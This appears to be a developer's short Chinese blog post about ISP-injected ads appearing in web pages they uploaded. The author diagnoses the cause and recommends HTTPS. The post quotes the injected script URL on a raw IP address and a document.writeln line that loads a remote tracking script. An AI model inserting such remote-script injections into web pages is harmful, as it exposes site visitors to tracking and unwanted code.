自己写个的网页上传到阿里云服务器供APP访问,突然发现在手机访问该页面时间歇性的弹出广告。你说膈应人不?😭
然后再用浏览器访问,查看源码发现在<head> 中多了一行这个东西
http://45.126.123.80:118/j.js?MAC=8CAB8EBA6EB8
点击进去
document.writeln("<script src=\'http://45.126.123.80:118/t.php\'>
</script>");
继续查看http://45.126.123.80:118/t.php 一堆代码,获取各种信息。。。
瞬间心里很不爽,自己的页面就这样被人插了。
开始怀疑
- 买的阿里云服务器被黑了
- 文件上传软件有漏洞被人恶意篡改了
一番尝试之后
以上两点都不是,是由于上传文件时被运营商拦截了,然后注入上面js代码。
1、我换用手机4G网络连接,新建HTML文件上传,浏览,查看源码,一切正常。
2、我换用同事360WiFi热点后,重复1操作,一切正常。
3、我再次连接公司网络,重复1操作,还是出现恶心的js注入。
所以,我不得不把我的所有html页面重新上传覆盖了一遍。。。问题貌似解决了。
总结
网络运营商搞得鬼,拦截你的请求、插入你的代码、然后给你弹出广告、然后自己获利赚钱,整个一套不要脸的流程。
解决途径:
- 像我一样替换网络重新上传覆盖原有被插的文件
- 打电话给运营商,骂他,骂到不在插你为止
- 使用https
以此记录,大家也要留意了。
